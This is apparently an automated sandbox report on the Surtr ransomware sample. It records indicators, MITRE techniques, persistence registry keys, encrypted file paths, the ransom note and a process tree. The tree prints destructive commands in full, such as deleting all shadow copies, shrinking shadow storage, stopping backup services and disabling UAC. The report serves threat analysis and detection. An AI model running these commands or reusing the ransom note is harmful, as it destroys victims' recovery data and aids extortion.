surtr | 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980

Resubmissions

01-11-2022 14:02

221101-rckx8sddcn 10

24-12-2021 07:08

211224-hx8qcscee3 10

Analysis

max time kernel
149s
max time network
44s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
01-11-2022 14:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

surtr.exe
Size

320KB
MD5

e6fc190168519d6a6c4f1519e9450f0f
SHA1

af2080ddf1064fb80c7b9af942aaabf264441098
SHA256

8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
SHA512

4522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba
SSDEEP

6144:Q4K8rYBWqjbqL7busNWGl3GDmm+miR9zrmkdAZ:Q46QKbQJNDl3cmgiRlK

Score

10^/10

surtr evasion persistence ransomware spyware stealer trojan upx

Malware Config

Extracted

Path

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta

Family

surtr

Ransom Note

SurtrRansomware OOPS ALL YOUR IMPORTANT FILES HAVE BEEN ENCRYPTED AND STOLEN !! Notice : There is only one way to restore your data read the boxes carefully! Attention : Do Not change file names. Do Not try to decrypt using third party softwares , it may cause permanent data loss . If you do not pay the fee within one month , your important files will be published in our public belog . Do not pay any money before decrypting the test files. You can use our 50% discount if you pay the fee within first 15 days of encryption . otherwise the price will be doubled. In order to warranty you , our team will decrypt 3 of your desired files for free.but you need to pay the specified price for the rest of the operation . How To Decrypt : Your system is offline . in order to contact us you can email this address [email protected] use this ID (lvBMGdsBHowF3m) for the title of your email . If you weren't able to contact us within 24 hours please email : [email protected] If you didn't get any respond within 48 hours use this link (Not Available Now).send your ID and your cryptor name (SurtrRansomwareUserName) therefore we can create another way to contact you as soon as possible

Emails

[email protected]

Signatures

Detects Surtr Payload 3 IoCs

resource	yara_rule
behavioral1/memory/1336-63-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/1336-68-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr
behavioral1/memory/1336-97-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr

Surtr
Ransomware family first seen in late 2021.
ransomware surtr

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
556	bcdedit.exe
2648	bcdedit.exe

rans 3 IoCs

resource	yara_rule
behavioral1/memory/1336-63-0x0000000140000000-0x0000000140136000-memory.dmp	rans
behavioral1/memory/1336-68-0x0000000140000000-0x0000000140136000-memory.dmp	rans
behavioral1/memory/1336-97-0x0000000140000000-0x0000000140136000-memory.dmp	rans

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

UPX packed file 8 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1336-55-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/1336-58-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/1336-59-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/1336-61-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/1336-62-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/1336-63-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/1336-68-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/1336-97-0x0000000140000000-0x0000000140136000-memory.dmp	upx

Drops startup file 6 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	cmd.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchos2 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\svchos3 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\svchos4 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos1 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe

Enumerates connected drives 3 TTPs 47 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\X:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\Y:	vssadmin.exe
File opened (read-only)	\??\F:	surtr.exe
File opened (read-only)	\??\O:	surtr.exe
File opened (read-only)	\??\S:	vssadmin.exe
File opened (read-only)	\??\P:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\M:	vssadmin.exe
File opened (read-only)	\??\W:	vssadmin.exe
File opened (read-only)	\??\K:	surtr.exe
File opened (read-only)	\??\Z:	surtr.exe
File opened (read-only)	\??\J:	vssadmin.exe
File opened (read-only)	\??\I:	surtr.exe
File opened (read-only)	\??\J:	surtr.exe
File opened (read-only)	\??\M:	surtr.exe
File opened (read-only)	\??\R:	surtr.exe
File opened (read-only)	\??\T:	vssadmin.exe
File opened (read-only)	\??\L:	vssadmin.exe
File opened (read-only)	\??\B:	vssadmin.exe
File opened (read-only)	\??\T:	surtr.exe
File opened (read-only)	\??\X:	surtr.exe
File opened (read-only)	\??\U:	surtr.exe
File opened (read-only)	\??\V:	vssadmin.exe
File opened (read-only)	\??\K:	vssadmin.exe
File opened (read-only)	\??\R:	vssadmin.exe
File opened (read-only)	\??\N:	vssadmin.exe
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\H:	surtr.exe
File opened (read-only)	\??\Q:	surtr.exe
File opened (read-only)	\??\V:	surtr.exe
File opened (read-only)	\??\Q:	vssadmin.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\A:	vssadmin.exe
File opened (read-only)	\??\U:	vssadmin.exe
File opened (read-only)	\??\I:	vssadmin.exe
File opened (read-only)	\??\G:	surtr.exe
File opened (read-only)	\??\N:	surtr.exe
File opened (read-only)	\??\W:	surtr.exe
File opened (read-only)	\??\Y:	surtr.exe
File opened (read-only)	\??\Z:	vssadmin.exe
File opened (read-only)	\??\O:	vssadmin.exe
File opened (read-only)	\??\E:	surtr.exe
File opened (read-only)	\??\L:	surtr.exe
File opened (read-only)	\??\P:	surtr.exe
File opened (read-only)	\??\S:	surtr.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1388 set thread context of 1336	1388	surtr.exe	27

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\codec\libtheora_plugin.dll.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Windows Journal\Templates\Music.jtp.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Proof.en\Proof.XML.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382970.JPG.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Microsoft Games\Multiplayer\Spades\Shvl.dll.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\SpiderSolitaireMCE.lnk.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler-common.xml.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Microsoft Office\Office14\VISSHE.DLL.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\CONVERT\OL.SAM.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_bullets.gif.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\item_hover_floating.png.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\Stationery\GreenBubbles.jpg.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kuala_Lumpur.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Hardcover.xml.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.http.jetty_3.0.200.v20131021-1843.jar.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Jamaica.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\vlc.mo.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\Tulip.jpg.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-windows_ja.jar.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\System.Core.dll.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\vlc.mo.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_left_disabled.png.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\msadc\msdaprst.dll.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WHIRL2.WMF.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD14654_.GIF.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Pets\Notes_LOOP_BG_PAL.wmv.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Hong_Kong.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SKY\SKY.ELM.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0196354.WMF.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\POSTITL.ICO.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\ApothecaryMergeLetter.dotx.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\jce.jar.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\ink\it-IT\mshwLatin.dll.mui.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0103058.WMF.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187851.WMF.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00466_.WMF.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN054.XML.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\ACADEMIC.ONE.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Soft Blue.htm.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00078_.WMF.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\mailapi.jar.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\codec\libaribsub_plugin.dll.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0251925.WMF.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGAD.XML.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\DVD Maker\SecretST.TTF.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\bin\jsoundds.dll.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd.otf.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\Tulip.jpg.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21320_.GIF.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Sort\TITLE.XSL.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_blue_partly-cloudy.png.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ru.jar.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-outline.jar.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\WATERMAR\WATERMAR.INF.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR46B.GIF.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Discussion\DiscussionToolIconImagesMask.bmp.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PROOF\MSHY7ES.DLL.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jre7\lib\charsets.jar.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\en-US\clock.html.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA00389_.WMF.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTLOOK.DEV_K_COL.HXK.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked-loading.png.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\ink\fr-FR\rtscom.dll.mui.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TipsImage.jpg.[[email protected]].SURT	surtr.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
888	schtasks.exe
2552	schtasks.exe

Interacts with shadow copies 2 TTPs 27 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
2140	vssadmin.exe
2296	vssadmin.exe
2400	vssadmin.exe
1812	vssadmin.exe
1616	vssadmin.exe
1052	vssadmin.exe
1952	vssadmin.exe
1088	vssadmin.exe
2228	vssadmin.exe
2092	vssadmin.exe
2492	vssadmin.exe
1100	vssadmin.exe
1728	vssadmin.exe
2156	vssadmin.exe
2368	vssadmin.exe
2520	vssadmin.exe
2252	vssadmin.exe
2408	vssadmin.exe
2480	vssadmin.exe
2080	vssadmin.exe
2384	vssadmin.exe
2500	vssadmin.exe
1560	vssadmin.exe
1144	vssadmin.exe
2452	vssadmin.exe
2416	vssadmin.exe
2472	vssadmin.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1336	surtr.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeBackupPrivilege	2316	vssvc.exe
Token: SeRestorePrivilege	2316	vssvc.exe
Token: SeAuditPrivilege	2316	vssvc.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1388 wrote to memory of 1336	1388	surtr.exe	27
PID 1388 wrote to memory of 1336	1388	surtr.exe	27
PID 1388 wrote to memory of 1336	1388	surtr.exe	27
PID 1388 wrote to memory of 1336	1388	surtr.exe	27
PID 1388 wrote to memory of 1336	1388	surtr.exe	27
PID 1388 wrote to memory of 1336	1388	surtr.exe	27
PID 1388 wrote to memory of 1336	1388	surtr.exe	27
PID 1336 wrote to memory of 1940	1336	surtr.exe	28
PID 1336 wrote to memory of 1940	1336	surtr.exe	28
PID 1336 wrote to memory of 1940	1336	surtr.exe	28
PID 1336 wrote to memory of 1808	1336	surtr.exe	29
PID 1336 wrote to memory of 1808	1336	surtr.exe	29
PID 1336 wrote to memory of 1808	1336	surtr.exe	29
PID 1336 wrote to memory of 792	1336	surtr.exe	30
PID 1336 wrote to memory of 792	1336	surtr.exe	30
PID 1336 wrote to memory of 792	1336	surtr.exe	30
PID 792 wrote to memory of 1620	792	cmd.exe	31
PID 792 wrote to memory of 1620	792	cmd.exe	31
PID 792 wrote to memory of 1620	792	cmd.exe	31
PID 1336 wrote to memory of 1568	1336	surtr.exe	32
PID 1336 wrote to memory of 1568	1336	surtr.exe	32
PID 1336 wrote to memory of 1568	1336	surtr.exe	32
PID 1336 wrote to memory of 1668	1336	surtr.exe	34
PID 1336 wrote to memory of 1668	1336	surtr.exe	34
PID 1336 wrote to memory of 1668	1336	surtr.exe	34
PID 1336 wrote to memory of 1208	1336	surtr.exe	33
PID 1336 wrote to memory of 1208	1336	surtr.exe	33
PID 1336 wrote to memory of 1208	1336	surtr.exe	33
PID 1336 wrote to memory of 776	1336	surtr.exe	49
PID 1336 wrote to memory of 776	1336	surtr.exe	49
PID 1336 wrote to memory of 776	1336	surtr.exe	49
PID 1336 wrote to memory of 2028	1336	surtr.exe	48
PID 1336 wrote to memory of 2028	1336	surtr.exe	48
PID 1336 wrote to memory of 2028	1336	surtr.exe	48
PID 1336 wrote to memory of 1204	1336	surtr.exe	47
PID 1336 wrote to memory of 1204	1336	surtr.exe	47
PID 1336 wrote to memory of 1204	1336	surtr.exe	47
PID 1336 wrote to memory of 1180	1336	surtr.exe	46
PID 1336 wrote to memory of 1180	1336	surtr.exe	46
PID 1336 wrote to memory of 1180	1336	surtr.exe	46
PID 1336 wrote to memory of 976	1336	surtr.exe	45
PID 1336 wrote to memory of 976	1336	surtr.exe	45
PID 1336 wrote to memory of 976	1336	surtr.exe	45
PID 1336 wrote to memory of 1532	1336	surtr.exe	44
PID 1336 wrote to memory of 1532	1336	surtr.exe	44
PID 1336 wrote to memory of 1532	1336	surtr.exe	44
PID 1336 wrote to memory of 932	1336	surtr.exe	43
PID 1336 wrote to memory of 932	1336	surtr.exe	43
PID 1336 wrote to memory of 932	1336	surtr.exe	43
PID 1336 wrote to memory of 1972	1336	surtr.exe	42
PID 1336 wrote to memory of 1972	1336	surtr.exe	42
PID 1336 wrote to memory of 1972	1336	surtr.exe	42
PID 1336 wrote to memory of 924	1336	surtr.exe	41
PID 1336 wrote to memory of 924	1336	surtr.exe	41
PID 1336 wrote to memory of 924	1336	surtr.exe	41
PID 1336 wrote to memory of 1092	1336	surtr.exe	40
PID 1336 wrote to memory of 1092	1336	surtr.exe	40
PID 1336 wrote to memory of 1092	1336	surtr.exe	40
PID 1336 wrote to memory of 452	1336	surtr.exe	39
PID 1336 wrote to memory of 452	1336	surtr.exe	39
PID 1336 wrote to memory of 452	1336	surtr.exe	39
PID 1336 wrote to memory of 908	1336	surtr.exe	38
PID 1336 wrote to memory of 908	1336	surtr.exe	38
PID 1336 wrote to memory of 908	1336	surtr.exe	38

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
3032	attrib.exe
556	attrib.exe

C:\Users\Admin\AppData\Local\Temp\surtr.exe
"C:\Users\Admin\AppData\Local\Temp\surtr.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1388
- C:\Users\Admin\AppData\Local\Temp\surtr.exe
  "C:\Users\Admin\AppData\Local\Temp\surtr.exe"
  2⤵
  - Enumerates connected drives
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service
    3⤵
    PID:1940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c echo off
    3⤵
    PID:1808
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c chcp 437
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:792
  - - C:\Windows\system32\chcp.com
      chcp 437
      4⤵
      PID:1620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB
    3⤵
    PID:1568
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB
      4⤵
      PID:1516
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
    3⤵
    PID:1208
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
      4⤵
      PID:1976
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=E:\ /on=E:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2252
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c net stop "Acronis VSS Provider"
    3⤵
    PID:1668
  - - C:\Windows\system32\net.exe
      net stop "Acronis VSS Provider"
      4⤵
      PID:1096
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "Acronis VSS Provider"
        5⤵
        
        PID:1728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet
    3⤵
    PID:740
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin Delete Shadows /all /quiet
      4⤵
      PID:1716
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin Delete Shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:2368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
    3⤵
    PID:1544
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
      4⤵
      PID:1804
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=A:\ /on=A:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:2092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
    3⤵
    PID:900
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
      4⤵
      PID:1564
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=Z:\ /on=Z:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:1728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
    3⤵
    PID:908
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
      4⤵
      PID:1940
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=X:\ /on=X:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:1812
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
    3⤵
    PID:452
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
      4⤵
      PID:1712
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=V:\ /on=V:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:1088
      - C:\Windows\system32\net.exe
        
        net stop "SQLAgent$BKUPEXEC"
        6⤵
        
        PID:764
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$BKUPEXEC"
        7⤵
        
        PID:2712
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop "SQLAgent$ECWDB2"
        5⤵
        
        PID:2660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
    3⤵
    PID:1092
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
      4⤵
      PID:956
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=T:\ /on=T:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
        Interacts with shadow copies
        
        PID:1952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
    3⤵
    PID:924
  - - C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
      4⤵
      PID:1936
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin resize shadowstorage /for=K:\ /on=K:\ /maxsize=401MB
        5⤵
        Enumerates connected drives
